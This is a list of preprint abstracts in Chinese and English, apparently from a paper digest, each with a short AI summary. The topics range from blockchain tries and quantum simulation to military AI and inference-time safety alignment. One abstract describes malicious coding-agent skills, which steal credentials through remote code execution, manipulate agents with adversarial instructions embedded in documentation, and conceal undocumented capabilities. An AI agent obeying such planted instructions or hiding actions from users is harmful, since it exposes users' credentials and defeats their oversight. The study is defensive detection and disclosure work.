ALIGNBEAM: Inference-Time Alignment Transfer via Cross-Vocabulary Logit Mixing
ALIGNBEAM: 通过跨词汇表logit混合实现推理时对齐迁移
发表机构 * Lexsi Labs
AI总结 针对领域微调降低大模型安全性的问题,提出无需训练的ALIGNBEAM方法,通过逐token翻译锚模型logit并选择最安全候选,实现跨词汇表的安全对齐迁移,保持任务准确性和推理开销。
ALIGNBEAM: 通过跨词汇表logit混合实现推理时对齐迁移
Chirag Chawla, Pratinav Seth, Vinay Kumar Sankarapu
发表机构 * Lexsi Labs
AI总结 针对领域微调降低大模型安全性的问题,提出无需训练的ALIGNBEAM方法,通过逐token翻译锚模型logit并选择最安全候选,实现跨词汇表的安全对齐迁移,保持任务准确性和推理开销。
领域微调会降低大型语言模型的安全性:微调后的专家模型容易顺从以领域语言表述的有害提示。现有的推理时防御方法通过混合来自安全锚模型的logit,但要求两个模型共享词汇表,这使得它们无法用于安全性退化最严重的跨族专家模型。我们提出ALIGNBEAM,一种无需训练的方法,通过在每个解码步骤逐token将锚模型logit翻译为目标模型的词汇表来解除这一限制;然后一个小型LLM法官从K个候选续写中选择最安全的。无需改变权重,并且可以在部署时调整安全-效用权衡而无需重新训练。在跨词汇表和同词汇表评估对中,ALIGNBEAM显著提高了对抗性基准上的拒绝率,同时将任务准确性和推理开销保持在实用范围内。结果表明,安全对齐可以在推理时在不同模型族之间迁移,而无需修改任一模型的权重。
Domain fine-tuning degrades the safety of large language models: fine-tuned specialists readily comply with harmful prompts framed in domain language. Existing inference-time defenses that mix logits from a safe anchor model require both models to share a vocabulary, which rules them out for the cross-family specialists where safety is most degraded. We present ALIGNBEAM, a training-free method that lifts this restriction by translating anchor logits into the target model's vocabulary token-by-token at each decoding step; a small LLM judge then selects the safest among K candidate continuations. No weights are changed, and the safety-utility trade-off can be tuned at deployment without retraining. Across both cross-vocabulary and same-vocabulary evaluation pairs, ALIGNBEAM substantially raises refusal on adversarial benchmarks while keeping task accuracy and inference overhead within practical bounds. The results show that safety alignment can be transferred between model families at inference time, without touching either model's weights.
MHOT:面向区块链状态承诺的高度优化认证数据结构
Sipeng Xie, Qianhong Wu, Minghang Li, Qiyuan Gao, Bo Qin, Qin Wang
AI总结 针对Merkle Patricia Trie树高增长及Nurgle攻击问题,提出MHOT,通过区分位索引实现自适应扇出和最小高度,并引入分层证明降低证明开销,在以太坊主网负载下实现9倍写吞吐量提升和0%攻击成功率。
状态根计算占区块链区块处理时间的78%。以太坊的规范认证数据结构,即Merkle Patricia Trie(MPT),遭受严重的树高增长问题,并容易受到\textit{Nurgle攻击}(SP'24),其中攻击者通过哈希碰撞膨胀路径深度,以可忽略的成本降低系统性能。现有防御措施通过增加节点扇出(跨度)来限制树高,但更高的扇出会指数级增加证明大小。先前的工作使用向量承诺来缓解这种权衡,但代价是需要可信设置或昂贵的验证。我们提出\textsc{Mhot},一种用于区块链状态承诺的高度最优认证数据结构,它保留了基于哈希的标准验证,无需可信设置。与MPT的固定前缀索引(将跨度和扇出指数级耦合)不同,\textsc{Mhot}通过实际区分键的区分位进行索引,实现了具有线性扇出耦合的自适应跨度和可证明的最小高度。为了防止高扇出膨胀证明,我们引入了分层证明,一种两层Merkle结构,将每节点证明开销从O(k)降低到O(log k)。在以太坊主网负载下,\textsc{Mhot}相比MPT实现了高达9倍的写吞吐量、4倍低的写放大和2倍小的证明。在Nurgle攻击下,即使攻击者消耗了整个区块的gas预算,\textsc{Mhot}仍保持0%的攻击成功率(相比之下,MPT为99.97%)。我们的结果有些令人惊讶地表明,高度最优性(而非新的密码学原语!)是可扩展且抗攻击的区块链状态承诺的关键抽象。
State root computation dominates (78%) blockchain block processing time. Ethereum's canonical authenticated data structure, i.e., Merkle Patricia Trie (MPT), suffers from severe tree-height growth and is vulnerable to \textit{Nurgle attacks} (SP'24), where adversaries inflate path depth via hash collisions and degrade system performance at negligible cost. Existing defenses increase node fanout (span) to bound tree height, but higher span inflates proof size exponentially. Prior work mitigates this trade-off using vector commitments, at the cost of trusted setup or expensive verification. We present \textsc{Mhot}, a height-optimal authenticated data structure for blockchain state commitment that preserves standard hash-based verification without trusted setup. Unlike MPT's fixed-prefix indexing, which couples span and fanout exponentially, \textsc{Mhot} indexes by discriminative bits that actually distinguish keys, achieving adaptive span with linear fanout coupling and provably minimal height. To prevent high fanout from inflating proofs, we introduce hierarchical proofs, a two-layer Merkle construction that reduces per-node proof overhead from O(k) to O(log k). On Ethereum mainnet workloads, \textsc{Mhot} achieves up to 9X higher write throughput, 4X lower write amplification, and 2X smaller proofs than MPT. Under Nurgle attacks, even when the adversary consumes an entire block's gas budget, \textsc{Mhot} maintains a 0% attack success rate (v.s., 99.97% for MPT). Our results, somewhat surprisingly, show that height optimality (not new crypto primitives!) is the key abstraction for scalable and attack-resilient blockchain state commitment.
面向预测量子电路模拟性能的族感知残差架构
Honjar Xing, Yehong Jiang, Xianbang Wang, Zehua Wang, Zhicheng Jiang
AI总结 提出族感知残差架构,利用电路族分类和算法指纹特征,预测量子电路模拟的最小近似阈值和运行时间,在7-130量子比特、10个算法族上实现79.5%精确阈值准确率和R²=0.82运行时间相关性。
近似张量网络模拟器能够对超出精确方法范围的量子电路进行经典模拟,但选择最优近似参数(如键维阈值)仍然是一个成本高昂的试错过程。我们提出了一种族感知神经架构,仅根据电路的OpenQASM描述和执行上下文,即可预测实现目标保真度所需的最小近似阈值以及量子电路模拟的预期挂钟运行时间。我们的关键洞察是,来自不同算法族(例如QFT、Grover、VQE)的量子电路由于其不同的纠缠结构而表现出根本不同的模拟成本曲线。我们采用族条件残差校正——在共享骨干网络之上添加的、针对特定族的加性调整,借鉴了已建立的条件计算技术——使模型能够同时捕获通用电路属性和算法细微差别。该架构包含一个预训练的族分类器(准确率97.5%)和从门组成启发式算法导出的领域信息算法指纹特征。在跨越7-130量子比特、10个算法族的电路上评估,我们的系统实现了79.5%的精确阈值准确率(91.2%在一个阶梯内)和R²=0.82的运行时间相关性,推理时间约为50毫秒——取代了可能需要数分钟到数小时的试错模拟运行。消融研究证实,族感知建模提供了最大的单一性能改进(+3.2个百分点),验证了算法族是模拟成本预测的一等特征的假设。
Approximate tensor-network simulators enable classical simulation of quantum circuits beyond the reach of exact methods, but selecting optimal approximation parameters -- such as bond dimension thresholds -- remains a costly trial-and-error process. We present a family-aware neural architecture that predicts both the minimum approximation threshold required to achieve target fidelity and the expected wall-clock runtime for quantum circuit simulation, given only the circuit's OpenQASM description and execution context. Our key insight is that quantum circuits from different algorithmic families (e.g., QFT, Grover, VQE) exhibit fundamentally distinct simulation cost profiles due to their differing entanglement structures. We employ family-conditioned residual corrections -- additive, family-specific adjustments atop a shared backbone, drawing on established conditional computation techniques -- enabling the model to capture both universal circuit properties and algorithmic nuances. The architecture incorporates a pretrained family classifier (97.5% accuracy) and domain-informed algorithm fingerprint features derived from gate-composition heuristics. Evaluated on circuits spanning 7--130 qubits across 10 algorithm families, our system achieves 79.5% exact threshold accuracy (91.2% within one rung) and $R^2 = 0.82$ runtime correlation, with inference completing in approximately 50 ms -- replacing trial-and-error simulation runs that may take minutes to hours. Ablation studies confirm that family-aware modeling provides the single largest performance improvement (+3.2 percentage points), validating the hypothesis that algorithm family is a first-class feature for simulation cost prediction.
超空间集中性与量子算法中的对抗鲁棒性
Eric Yocam, Christian Yocam, Varghese Vaidyan, Yong Wang, Mahesh Kalappattil, Anthony Rizi
AI总结 提出以焦点度量F(ρ)=λ_max(ρ_super)形式化的超空间集中性作为量子资源,建立资源理论框架,通过GPU加速数值模拟验证其性质,并展示其在量子算法中的对抗鲁棒性优势。
我们将超空间集中性作为一种量子资源进行研究,通过焦点度量F(ρ)=λ_max(ρ_super)(约化超空间态的最大特征值)形式化,该度量量化了量子系统将信息权重集中到扩展自由度空间中优先子空间的能力。我们围绕该度量发展了一个完整的资源理论框架,并通过GPU加速数值模拟验证其性质。对于超空间维度dS∈{2,4,8,16,32},解析退相干预测被确认达到机器精度(1.11×10^{-16})。在六种系统配置下,焦点单调性在10,000个随机态中成立,且在四种焦点非生成信道下零违反。聚焦量子态抵抗相干酉攻击的韧性显著优于标准保真度预测,焦点在攻击强度ε=0.302时仍高于0.9,而保真度在ε=0.174时已低于0.9。我们进一步证明焦点度量和U(dS)-不对称度量在操作上不同:在相干和定向攻击下,不对称性保持接近零且不提供鲁棒性信号,而焦点跟踪谱集中性并在ε>0.3前保持鲁棒。通过恒等式F(|ψ_k><ψ_k|)=P(marked),Grover算法与超空间集中性的联系被明确建立,为预言查询复杂度提供了资源理论解释。最后,我们首次数值刻画了焦点容量间隙ΔF,识别出log_2(dS)标度律,并在乘积和关联噪声信道中得到确认。
We study superspace concentration as a quantum resource, formalized through the focus measure F(\r{ho}) = {\lambda}_max(\r{ho}_super) - the largest eigenvalue of the reduced superspace state - which quantifies the capacity of a quantum system to concentrate informational weight into a preferred subspace of an extended degree-of-freedom space. We develop a complete resource-theoretic framework around this measure and validate its properties through GPU-accelerated numerical simulation. Analytic decoherence predictions are confirmed to machine precision (1.11 x 10^{-16}) for superspace dimensions dS in {2,4,8,16,32}. Focus monotonicity holds across 10,000 random states with zero violations under four focus-non-generating channels across six system configurations. Focused quantum states resist coherent unitary attacks with significantly greater resilience than standard fidelity predicts, with focus remaining above 0.9 at attack strength {\epsilon} = 0.302 versus {\epsilon} = 0.174 for fidelity. We further demonstrate that the focus measure and the U(dS)-asymmetry measure are operationally distinct: asymmetry remains near zero and provides no robustness signal under coherent and targeted attacks while focus tracks spectral concentration and remains robust until {\epsilon} > 0.3. The connection between Grover's algorithm and superspace concentration is made explicit via the identity F(|{\psi}_k><{\psi}_k|) = P(marked), providing a resource-theoretic interpretation of oracle query complexity. Finally, we provide the first numerical characterization of the focus capacity gap {\Delta}F, identifying a log_2(dS) scaling law confirmed for both product and correlated noise channels.
AI研究人员必须主导军备控制以降低军事AI风险
Ted Fujimoto, Jacob Benz
AI总结 本文主张AI研究人员应主导军备控制研究,通过借鉴核威慑经验,推动验证与外交技术创新,以降低军事AI应用带来的紧迫风险。
AI能力的进步迫使研究人员和公众更加关注其潜在的全球影响。一个紧迫的近期问题是军事AI应用的监管。武器制造商和国防承包商正在加大对AI能力的投资,并与AI公司建立合作伙伴关系,形成了一个新兴的联盟,要求军事领导人、军备控制外交专家和AI研究人员合作,以确保更安全的未来。虽然AI研究人员通常关注超级智能AI的长期影响,但这种方法可能无法充分应对军事应用中AI带来的直接挑战。成功需要承认并减轻前沿AI模型(计划集成到国防应用中,如军事AI系统)的新兴风险。军备控制已经减少了过去的灾难性风险,因此从核威慑中吸取的经验教训可以指导AI安全与安保研究,推动验证和外交方面的创新。然而,AI研究人员必须协助主导技术研究,明确定义并缓解军事环境中的不稳定性。鉴于这些新责任以及缺乏足够可靠的解决方案,我们认为AI研究人员必须在推进军备控制研究以最小化军事AI应用风险方面发挥主导作用。
The advancement of AI capabilities compels researchers and the public to be more aware of its potential worldwide impact. A pressing near-term concern is the regulation of military AI applications. Armament manufacturers and defense contractors are increasingly investing in AI capabilities and forging partnerships with AI companies, creating a burgeoning coalition that demands military leaders, arms control diplomacy experts, and AI researchers collaborate to ensure a safer future. While AI researchers often focus on the long-term implications of superintelligent AI, this approach may not adequately address the immediate challenges posed by AI in military applications. Success requires acknowledging and mitigating the emerging risks of frontier AI models that plan to be integrated into defense applications, like military AI systems. Arms control has reduced past catastrophic risks, so lessons learned from nuclear deterrence can guide AI safety and security research towards innovations in verification and diplomacy. AI researchers, however, must assist in leading the technical research that clearly defines and alleviates instability in military settings. Given these new responsibilities and the lack of sufficiently reliable solutions, we argue that AI researchers must take a leading role in advancing arms control research to minimize risk in military AI applications.
通过程序化推理实现人楼交互的零样本多智能体框架
Yuqi Wang, Gulai Shen, Ali Mehmani
AI总结 提出一种分层多智能体框架,利用语义路由和程序化推理解耦自然语言理解与建筑分析,通过“门卫”机制分解任务并生成可执行Python脚本,在200多栋商业建筑数据上验证了准确性和上下文响应能力。
大型语言模型(LLM)通过直观界面实现与复杂建筑系统的更直接交互,为增强人楼交互(HBI)提供了机会。这些系统的特点包括跨多种格式的海量数据、缺乏非机密且可泛化的信息,以及需要领域专业知识进行解释。将LLM应用于HBI等特定领域任务带来了额外挑战。有限的训练数据使得传统微调方法不切实际。同时,LLM训练数据的不透明性需要谨慎集成领域知识以确保可靠性。此外,不同LLM表现出不同的对齐特性,表明实现自然交互和技术准确性需要多智能体方法。这些挑战凸显了需要创新方法来使LLM适应专业领域,同时保持准确性和用户参与度。在本文中,我们开发了一个分层多智能体框架,利用语义路由和程序化推理将自然语言理解与建筑分析解耦。与标准的RAG方法不同,我们的系统采用“门卫”机制进行任务分解,并使用专门的编码智能体生成可执行Python脚本以进行精确计算。我们在来自200多栋商业建筑的数据集上验证了该框架。结果表明,该框架能够为从租户到建筑管理员的各类用户,在各种建筑系统应用中提供准确且上下文相关的响应。
Large Language Model (LLM) offers opportunities to enhance Human-Building Interaction (HBI) by enabling more direct interactions through intuitive interfaces to complex building systems. These systems can be characterized by the vast amounts of data across multiple formats, the lack of nonconfidential and generalizable information, and the requirement of domain expertise for interpretation. Applying LLMs to domain-specific tasks like HBI presents additional challenges. Limited training data makes traditional fine-tuning approaches impractical. Meanwhile, the opacity of LLM training data requires careful integration of domain knowledge to ensure reliability. Additionally, different LLMs exhibit varying alignment characteristics, suggesting that achieving both natural interaction and technical accuracy requires a multi-agent approach. These challenges highlight the need for innovative approaches to adapt LLMs for specialized domains while maintaining accuracy and user engagement. In this paper, we develop a hierarchical multi-agent framework that utilizes semantic routing and programmatic reasoning to decouple natural language understanding from building analytics. Instead of standard RAG approaches, our system employs a "Doorman" mechanism for task decomposition and specialized coding agents that generate executable Python scripts for precise arithmetic. We validate this framework on a dataset from more than 200 commercial buildings. Results demonstrate the effectiveness in providing accurate and contextual responses for diverse users, including stakeholders, from tenants to building managers, across various building system applications.
面向公共道路交通中车辆远程操作的联合理解
Elisabeth Shi, Maria-Magdalena Wolf, Nina Theobald, Bettina Abendroth, Eugen Wige, Johannes Springer, Katharina Hottelart, Andreas Schrank, Thorben Brandt, Michael Oehl, Frank Diermeyer, Lena Plum
AI总结 本文提出一个框架,通过追溯人车信息处理差异的术语,统一远程操作概念,促进跨学科交流,并整合近期讨论的远程操作形式。
持续驾驶自动化系统被设想用作无人驾驶出行服务的基础。然而,研究人员和从业者都承认,当前的驾驶自动化系统尚无法处理人类驾驶员能够处理的所有交通情况。为了弥合这一差距并实现无需车内人类驾驶员或后备的出行服务,远程操作(或遥操作)正被越来越多地讨论。最近,已采取首批法律行动,允许在公共道路上进行某些形式的远程操作。远程操作涵盖了支持驾驶自动化系统的广泛方法,从远程辅助(包括提供信息或释放操作)到远程驾驶(包括从远程位置驾驶车辆)。因此,在公共道路交通中安全实施远程操作对多个学科(如工程学、心理学、信息学、法学等)和利益相关者(如远程操作服务提供商、远程操作员、车辆制造商、监管机构等)的协作提出了挑战。同时,由于期望和语言的不同,跨学科讨论往往具有挑战性。为了建立共同基础,本文追溯术语到人类和车辆双方信息处理的原始差异。该框架旨在通过明确指定需要什么来吸引包括不同背景和兴趣的研究人员和利益相关者在内的多样化受众,从而帮助进一步讨论。近期讨论的远程操作形式被整合到该框架中。
Sustained driving automation systems are envisioned to be used as the foundation for driverless mobility services. However, both researchers and practitioners acknowledge that current driving automation systems are not yet able to handle all traffic situations that a human driver can handle. To bridge this gap and enable mobility services without an in-vehicle human driver or fallback, remote operation (or teleoperation) is increasingly discussed. Recently, first legal actions have been taken to enable some forms of remote operation on public roads. Remote operation encompasses a broad spectrum of methods to support a driving automation system, ranging from remote assistance, which includes providing information or releasing a maneuver, to remote driving, which includes driving the vehicle from a remote location. As such, safe implementation of remote operation in public road traffic challenges the collaboration of multiple academic disciplines (e.g. engineering, psychology, informatics, law, etc.) and stakeholders (e.g. remote operation service providers, remote operators, vehicle manufacturers, regulatory authorities, etc.). At the same time, the interdisciplinary discourse is often challenging due to differing expectations and language. To build a common ground, this article traces terminology back to the original differences in information processing both on human and vehicle side. This framework aims to help further discourse by directly specifying what is needed to engage a diverse audience including researchers and stakeholders of different backgrounds and interests. Recently discussed forms of teleoperation are integrated into this framework.
通过射频广播信号远程编程自旋神经网络权重
M. Menshawy (1), D. Sanz-Hernández (1), L. Mazza (2), V. Puliafito (2), G. Finocchio (3), A. Jenkins (4), R. Ferreira (4), L. Benetti (4), J. Grollier (1), F.A. Mizrahi (1) ((1) Laboratoire Albert Fert, CNRS, Thales, Université Paris-Saclay, Palaiseau, France, (2) Department of Electrical and Information Engineering, Politecnico di Bari, Bari, Italy, (3) Department of Mathematical and Computer Sciences, Physical Sciences and Earth Sciences, University of Messina, Messina, Italy, (4) International Iberian Nanotechnology Laboratory, Braga, Portugal)
AI总结 提出利用共享带状线广播射频信号远程编程串联磁隧道结链的突触权重,无需独立访问线,实现可重构自旋神经形态硬件,在手写数字和无人机RF签名分类任务中验证了效果。
在不影响可扩展性的情况下选择性编程大量非易失性突触权重是存内计算的关键挑战。在这里,我们演示了通过共享带状线施加广播射频信号,对由11个基于涡旋的磁隧道结构成的串联链中的突触权重进行远程编程。该编程依赖于涡旋核心极性的频率选择性翻转,因此不需要单独的访问线或选择器件。通过重新配置这些链的二进制状态,我们重塑了它们对频分复用RF输入执行的加权和。使用由两个这样的链组成的22突触网络,我们远程重新配置相同的硬件以执行两个不同的任务:手写数字分类和无人机RF签名识别。针对数字优化的配置在手写数字上达到94.91±0.26%的准确率,但在无人机RF签名上仅为13.17±0.47%;而针对无人机优化的配置在无人机上达到97.33±0.62%,但在数字上仅为47.59±1.5%。因此,广播RF编程为快速可重构的自旋神经形态硬件提供了一条紧凑且可扩展的途径。
Selectively programming large number of non-volatile synaptic weights without compromising scalability is a key challenge for in-memory computing. Here, we demonstrate remote programming of synaptic weights in series-connected chains of 11 vortex-based magnetic tunnel junctions using broadcast radiofrequency signals applied through a shared strip line. The programming relies on frequency-selective reversal of the vortex-core polarity and therefore does not require individual access lines or selector devices. By reconfiguring the binary states of these chains, we reshape the weighted sums they perform on frequency-multiplexed RF inputs. Using a 22-synapse network composed of two such chains, we remotely reconfigure the same hardware to perform two distinct tasks: handwritten-digit classification and drone RF-signature identification. The digit-optimized configuration reaches 94.91 +/- 0.26% accuracy on handwritten digits but only 13.17 +/- 0.47% on drone RF signatures, whereas the drone-optimized configuration reaches 97.33 +/- 0.62% on drones but only 47.59 +/- 1.5% on digits. Broadcast RF programming thus provides a compact and scalable route to rapidly reconfigurable spintronic neuromorphic hardware.
6G时代的万物互联:范式、使能技术、潜力与未来方向
Driss Choukri, Essaid Sabir, Elmahdi Driouch, Abdelkrim Haqiq
AI总结 本文综述了万物互联(IoE)的概念、核心组件、架构基础、使能技术及研究挑战,并探讨了面向6G智能IoE系统的开放研究方向,重点关注可扩展性、安全、隐私和能效。
万物互联(IoE)代表了物联网(IoT)的演进,通过将人、数据、流程和事物集成到一个统一的智能生态系统中。IoE旨在增强多个应用领域的自动化、决策和服务效率,例如智慧城市、医疗保健、工业和下一代无线网络。本文提供了IoE概念、其核心组件、架构基础、使能技术和主要研究挑战的结构化概述。最后,讨论了面向6G使能的智能IoE系统的开放研究方向,重点关注可扩展性、安全性、隐私和能效。
The Internet of Everything (IoE) represents an evolution of the Internet of Things (IoT) by integrating people, data, processes, and things into a unified intelligent ecosystem. IoE aims to enhance automation, decision-making, and service efficiency across multiple application domains such as smart cities, healthcare, industry, and next-generation wireless networks. This paper provides a structured overview of the IoE concept, its core components, architectural foundations, enabling technologies, and major research challenges. Finally, open research directions toward 6G-enabled intelligent IoE systems are discussed, with emphasis on scalability, security, privacy, and energy efficiency.
神经细胞自动机的吸引子景观可视化
James Stovold, Mia-Katrin Kvalsund, Harald Michael Ludwig, Varun Sharma, Alexander Mordvintsev
AI总结 本文应用流形学习和拓扑数据分析技术,从宏观和微观层面揭示神经细胞自动机(NCA)的行为流形,以增强其可解释性。
随着神经细胞自动机(NCA)越来越多地应用于人工生命中的玩具模型之外,迫切需要理解它们的行为并建立适当的途径来解释它们所学到的东西。就其本质而言,训练NCA的好处与缺乏可解释性相平衡:我们可以设计涌现行为,但理解所学内容的能力有限。在本文中,我们应用多种技术来撬开NCA的黑箱,并对其所学内容有所了解。我们应用流形学习技术(主成分分析以及密集和稀疏自编码器)以及拓扑数据分析技术(持续同调)来捕获NCA的底层行为流形,取得了不同程度的成功。结果表明,当在宏观层面进行分析(即把整个NCA状态作为一个数据点)时,底层流形通常相当简单,可以很好地捕获和分析。当在微观层面进行分析(即把单个细胞的状态作为一个数据点)时,流形高度复杂,需要更复杂的技术才能理解它。
As Neural Cellular Automata (NCAs) are increasingly applied outside of the toy models in Artificial Life, there is a pressing need to understand how they behave and to build appropriate routes to interpret what they have learnt. By their very nature, the benefits of training NCAs are balanced with a lack of interpretability: we can engineer emergent behaviour, but have limited ability to understand what has been learnt. In this paper, we apply a variety of techniques to pry open the NCA black box and glean some understanding of what it has learnt to do. We apply techniques from manifold learning (principal components analysis and both dense and sparse autoencoders) along with techniques from topological data analysis (persistent homology) to capture the NCA's underlying behavioural manifold, with varying success. Results show that when analysis is performed at a macroscopic level (i.e. taking the entire NCA state as a single data point), the underlying manifold is often quite simple and can be captured and analysed quite well. When analysis is performed at a microscopic level (i.e. taking the state of individual cells as a single data point), the manifold is highly complex and more complicated techniques are required in order to make sense of it.
“不要向用户提及此事”:检测与理解恶意代理技能
Yi Liu, Zhihao Chen, Yanjun Zhang, Gelei Deng, Yuekang Li, Jianting Ning, Leo Yu Zhang
AI总结 本文通过对两个主要注册中心的98,380个技能进行系统安全分析,结合静态模式匹配和动态行为验证,识别出157个恶意技能,揭示了13种攻击技术中的632个不同漏洞,并发现攻击复杂性与隐藏投入相关。
基于LLM的编码代理越来越依赖称为技能的第三方扩展,这些技能捆绑了自然语言指令和辅助脚本,以完全用户权限执行。社区注册中心已出现以分发这些技能,但由于缺乏标记的威胁数据,安全影响仍未得到研究。本文对从两个主要注册中心收集的98,380个技能进行了系统安全分析。通过静态模式匹配和动态行为验证的结合,我们识别出157个表现出确认恶意行为的技能,涵盖13种攻击技术中的632个不同漏洞。我们的分析表明,这些威胁是故意的而非偶然:每个恶意技能平均包含4.03个漏洞,跨越多个攻击阶段。我们识别出两种具有统计显著负相关的主要攻击策略——通过远程代码执行窃取凭证,以及通过嵌入文档中的对抗性指令操纵代理。超过一半的确认案例来自一个采用模板化品牌冒充大规模攻击的单一威胁行为者。我们进一步观察到,攻击复杂性与隐藏投入相关,高级技能普遍使用未记录的功能,同时利用平台原生的信任机制。在负责任的披露之后,注册中心维护者删除了所有157个(100%)报告的技能。我们的数据集和检测管道公开可用,以促进未来关于保护LLM代理生态系统安全的研究。
LLM-based coding agents increasingly rely on third-party extensions called skills, which bundle natural language instructions and helper scripts that execute with full user privileges. Community registries have emerged to distribute these skills, but the security implications remain unstudied due to the absence of labeled threat data. This paper presents a systematic security analysis of 98,380 skills collected from two major registries. Through a combination of static pattern matching and dynamic behavioral verification, we identify 157 skills exhibiting confirmed malicious behavior, encompassing 632 distinct vulnerabilities across 13 attack techniques. Our analysis reveals that these threats are deliberate rather than accidental: each malicious skill contains an average of 4.03 vulnerabilities spanning multiple attack phases. We identify two dominant attack strategies with statistically significant negative correlation -- credential theft via remote code execution, and agent manipulation through adversarial instructions embedded in documentation. Over half of all confirmed cases originate from a single threat actor employing templated brand impersonation at scale. We further observe that attack sophistication correlates with concealment investment, with advanced skills universally employing undocumented capabilities while also exploiting platform-native trust mechanisms. Following responsible disclosure, registry maintainers removed all 157 (100%) of the reported skills. Our dataset and detection pipeline are publicly available to facilitate future research on securing LLM agent ecosystems.
韧性设计:重型兆瓦级充电的关键绩效指标
Sonia Yeh, Rishabh Ghotge, Yujia Shi, Luka de Koe
AI总结 提出一种与压力源无关的韧性KPI,用于重型车辆兆瓦充电站,通过可观测信号量化站点在中断下的预期、运行和恢复能力,并归一化为0-100分以支持跨站点和供应商的基准测试。
我们为服务于重型车辆的兆瓦充电站(MSC)引入了一种与压力源无关的韧性关键绩效指标(Resilience KPI)。除了常规性能统计(如可用性、吞吐量)外,该KPI利用框架中已有的可观测信号量化站点预测、在退化下运行以及从中断中恢复的能力:穿越能力、恢复速度、N-1下的服务、预期未服务的充电能量以及队列影响。总体得分归一化为0-100分,以便进行公平的跨站点和跨供应商基准测试,并可选地提供特定压力源的细分(电网、ICT、热、洪水、现场事件)用于诊断和鲁棒性检查。DATEX II为以基础设施清单、状态和定价为中心的韧性KPI提供了坚实基础,而额外的KPI,特别是围绕电网容量、现场灵活性、重型车辆几何形状、环境加固、维护和市场暴露,对于完整的韧性图景至关重要,并且需要扩展或补充数据源。该KPI设计用于月度/季度报告,以支持设计和运营决策以及缓解措施(例如备用电源、备件、程序)的成本效益评估。它提供了一种一致、透明的方法,将异构日志和KPI整合为单一可审计指标,使韧性在站点、供应商和司法管辖区之间具有可比性。
We introduce a stressor-agnostic Resilience Key Performance Indicator (Resilience KPI) for megawatt charging stations (MSC) serving heavy-duty vehicles. Beyond routine performance statistics (e.g., availability, throughput), the KPI quantifies a site's ability to anticipate, operate under degradation, and recover from disruptions using observable signals already in the framework: ride-through capability, restoration speed, service under N-1, expected unserved charging energy, and queue impacts. The headline score is normalised to 0-100 for fair cross-site and cross-vendor benchmarking, with optional stressor-specific breakouts (grid, ICT, thermal, flooding, on-site incidents) for diagnostics and robustness checks. DATEX II provides a solid baseline for resilience KPIs centred on infrastructure inventory, status, and pricing, while additional KPIs, especially around grid capacity, on-site flexibility, heavy-vehicle geometry, environmental hardening, maintenance, and market exposure, are essential for a complete resilience picture and will require extensions or complementary data sources. The KPI is designed for monthly/quarterly reporting to support design and operational decisions and cost-benefit assessment of mitigations (e.g., backup power, spares, procedures). It offers a consistent, transparent methodology that consolidates heterogeneous logs and KPIs into a single, auditable indicator, making resilience comparable across sites, vendors, and jurisdictions.
Range-Arithmetic: 在不可信方上进行可验证的深度学习推理
Ali Rahimi, Babak H. Khalaj, Mohammad Ali Maddah-Ali
AI总结 提出Range-Arithmetic框架,通过将非算术运算转化为可验证的算术步骤,实现高效的深度神经网络推理验证,降低了计算和通信开销。
可验证计算(VC)在去中心化机器学习系统中日益重要,由于区块链的限制,深度神经网络(DNN)推理等资源密集型任务被外包给外部参与者。这产生了在不重新执行的情况下验证外包计算正确性的需求。我们提出了\texttt{Range-Arithmetic},一个新颖的框架,用于高效且可验证的DNN推理,它将非算术运算(如定点矩阵乘法后的舍入和ReLU)转化为可通过求和检查协议和串联范围证明验证的算术步骤。我们的方法避免了布尔编码、高次多项式和大查找表的复杂性,同时保持与基于有限域的证明系统的兼容性。实验结果表明,我们的方法不仅匹配现有方法的性能,还降低了验证结果的计算成本、执行DNN推理的不可信方所需的计算工作量以及双方之间的通信开销。
Verifiable computing (VC) has gained prominence in decentralized machine learning systems, where resource-intensive tasks like deep neural network (DNN) inference are offloaded to external participants due to blockchain limitations. This creates a need to verify the correctness of outsourced computations without re-execution. We propose \texttt{Range-Arithmetic}, a novel framework for efficient and verifiable DNN inference that transforms non-arithmetic operations, such as rounding after fixed-point matrix multiplication and ReLU, into arithmetic steps verifiable using sum-check protocols and concatenated range proofs. Our approach avoids the complexity of Boolean encoding, high-degree polynomials, and large lookup tables while remaining compatible with finite-field-based proof systems. Experimental results show that our method not only matches the performance of existing approaches, but also reduces the computational cost of verifying the results, the computational effort required from the untrusted party performing the DNN inference, and the communication overhead between the two sides.